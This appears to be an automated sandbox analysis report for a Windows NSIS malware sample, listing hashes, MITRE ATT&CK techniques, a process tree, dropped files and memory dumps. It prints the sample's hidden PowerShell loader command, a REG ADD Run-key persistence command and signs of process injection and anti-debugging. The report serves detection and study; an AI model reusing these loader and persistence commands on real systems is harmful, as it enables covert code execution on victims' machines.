8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8

General

Target

8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe
Size

541KB
MD5

93616677d7d1ebbfb979b905150bb3cd
SHA1

87037c76bc789909d49fa81887ce8465436f3ca0
SHA256

8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8
SHA512

cc17b5c1266c01dd8bf1d2a5269e228a3389083eca13cc1352f6638ab72a95beecc4e3a7b29d892813eb1843b0bd8b207fa987ad6224dfab6b606167946b5595
SSDEEP

12288:iH7MMIqb9BVAG8ITBF8qgvpnu1uo6c1yZODqCNtEplW8LmP:C7a69BVxh65K6+drGlW8LmP

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2492 powershell.exe

Loads dropped DLL 4 IoCs

Processes:

8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exepowershell.exeDisfranchising.exe

pid	process
2812	8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe
2812	8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe
2492	powershell.exe
1616	Disfranchising.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Beslutningsivrighed% -windowstyle minimized $stedtes=(Get-ItemProperty -Path 'HKCU:\\Stjydsk\\').Coswearer;%Beslutningsivrighed% ($stedtes)"	reg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeDisfranchising.exe

pid process

2492 powershell.exe
1616 Disfranchising.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2492 set thread context of 1616 2492 powershell.exe Disfranchising.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 2492 set thread context of 1616	2492	powershell.exe	Disfranchising.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Disfranchising.exe	nsis_installer_1
\Users\Admin\AppData\Local\Temp\Disfranchising.exe	nsis_installer_2

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2284 reg.exe

pid	process
2284	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exe

pid	process
2492	powershell.exe
2492	powershell.exe
2492	powershell.exe
2492	powershell.exe
2492	powershell.exe
2492	powershell.exe
2492	powershell.exe
2492	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2492 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2492 powershell.exe

description	pid	process
Token: SeDebugPrivilege	2492	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exepowershell.exeDisfranchising.execmd.exe

description	pid	process	target process
PID 2812 wrote to memory of 2492	2812	8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe	powershell.exe
PID 2812 wrote to memory of 2492	2812	8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe	powershell.exe
PID 2812 wrote to memory of 2492	2812	8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe	powershell.exe
PID 2812 wrote to memory of 2492	2812	8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe	powershell.exe
PID 2492 wrote to memory of 2352	2492	powershell.exe	cmd.exe
PID 2492 wrote to memory of 2352	2492	powershell.exe	cmd.exe
PID 2492 wrote to memory of 2352	2492	powershell.exe	cmd.exe
PID 2492 wrote to memory of 2352	2492	powershell.exe	cmd.exe
PID 2492 wrote to memory of 1616	2492	powershell.exe	Disfranchising.exe
PID 2492 wrote to memory of 1616	2492	powershell.exe	Disfranchising.exe
PID 2492 wrote to memory of 1616	2492	powershell.exe	Disfranchising.exe
PID 2492 wrote to memory of 1616	2492	powershell.exe	Disfranchising.exe
PID 2492 wrote to memory of 1616	2492	powershell.exe	Disfranchising.exe
PID 2492 wrote to memory of 1616	2492	powershell.exe	Disfranchising.exe
PID 1616 wrote to memory of 1648	1616	Disfranchising.exe	cmd.exe
PID 1616 wrote to memory of 1648	1616	Disfranchising.exe	cmd.exe
PID 1616 wrote to memory of 1648	1616	Disfranchising.exe	cmd.exe
PID 1616 wrote to memory of 1648	1616	Disfranchising.exe	cmd.exe
PID 1648 wrote to memory of 2284	1648	cmd.exe	reg.exe
PID 1648 wrote to memory of 2284	1648	cmd.exe	reg.exe
PID 1648 wrote to memory of 2284	1648	cmd.exe	reg.exe
PID 1648 wrote to memory of 2284	1648	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe
"C:\Users\Admin\AppData\Local\Temp\8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Twiddly=Get-Content 'C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Samkrt.ska';$Careeristic=$Twiddly.SubString(52755,3);.$Careeristic($Twiddly)"
2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2492

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
3⤵
PID:2352

C:\Users\Admin\AppData\Local\Temp\Disfranchising.exe
"C:\Users\Admin\AppData\Local\Temp\Disfranchising.exe"
3⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Beslutningsivrighed% -windowstyle minimized $stedtes=(Get-ItemProperty -Path 'HKCU:\Stjydsk\').Coswearer;%Beslutningsivrighed% ($stedtes)"
4⤵
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Beslutningsivrighed% -windowstyle minimized $stedtes=(Get-ItemProperty -Path 'HKCU:\Stjydsk\').Coswearer;%Beslutningsivrighed% ($stedtes)"
5⤵
- Adds Run key to start application
- Modifies registry key
PID:2284

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Erstatningssagerne.Kla
Filesize
278KB

MD5
4f78e43df25c818fd771e53a4a20ff12

SHA1
5760d9a9a52598353829595bd4df180a08377a12

SHA256
7a3580d146706d7ee3430c8e06dbaa24ede269bcbd67a4936dabae9ed904c415

SHA512
eb5c82bc6766a71654ebbeafd4df40e8d3519660c0529337da453ac5c5edc18ae0ae3cf3303b0bfee6f5a3085dc34c6e04dfc03f30b69003bdedaaa19acf0d3a

Download Submit
C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Samkrt.ska
Filesize
51KB

MD5
afd9c594ed116f7cdfe6c432ce10ff17

SHA1
a685bf1da29f74b5c9ac802b51a6c5e75a888285

SHA256
4832ff867a3915d5958b2d072fc93076f940f654c04f6bba8c9f80b8ea789dfb

SHA512
05738b6c609f28615f8d7c6725885fd44fe54370f8880385dc5056ff0c37525e7add80747ae657ea0c45f40932ded22c6099122f9dc7ebdad14145f513722917

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\degum.lnk
Filesize
890B

MD5
b4fef5471fddd48700b7aea5b3ac12ce

SHA1
a272b375ee5a7a1709d0c913a85f59ebd68695e5

SHA256
ea71ef3c6fa0f98b7bc764685d8284f5878cf3d6f25c8989911be76d29f84916

SHA512
d430702ce350d10bc815db44a40b251e7cd8e5f18ccaff7a8a743e231eb0d18530e65fb90c85e466b51368baaed2668c5ed8e340117ceae599f6d5d5d2003033

Download Submit
\Users\Admin\AppData\Local\Temp\Disfranchising.exe
Filesize
541KB

MD5
93616677d7d1ebbfb979b905150bb3cd

SHA1
87037c76bc789909d49fa81887ce8465436f3ca0

SHA256
8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8

SHA512
cc17b5c1266c01dd8bf1d2a5269e228a3389083eca13cc1352f6638ab72a95beecc4e3a7b29d892813eb1843b0bd8b207fa987ad6224dfab6b606167946b5595

Download Submit
\Users\Admin\AppData\Local\Temp\nsy840F.tmp\nsDialogs.dll
Filesize
9KB

MD5
1c8b2b40c642e8b5a5b3ff102796fb37

SHA1
3245f55afac50f775eb53fd6d14abb7fe523393d

SHA256
8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c

SHA512
4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57

Download Submit
memory/1616-75-0x0000000000400000-0x0000000001462000-memory.dmp

Filesize
16.4MB

Download
memory/1616-74-0x0000000000400000-0x0000000001462000-memory.dmp

Filesize
16.4MB

Download
memory/2492-63-0x0000000073900000-0x0000000073EAB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-62-0x0000000073900000-0x0000000073EAB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-67-0x0000000073900000-0x0000000073EAB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-69-0x0000000006160000-0x000000000A653000-memory.dmp

Filesize
68.9MB

Download
memory/2492-61-0x0000000073900000-0x0000000073EAB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-60-0x0000000073900000-0x0000000073EAB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-59-0x0000000073901000-0x0000000073902000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads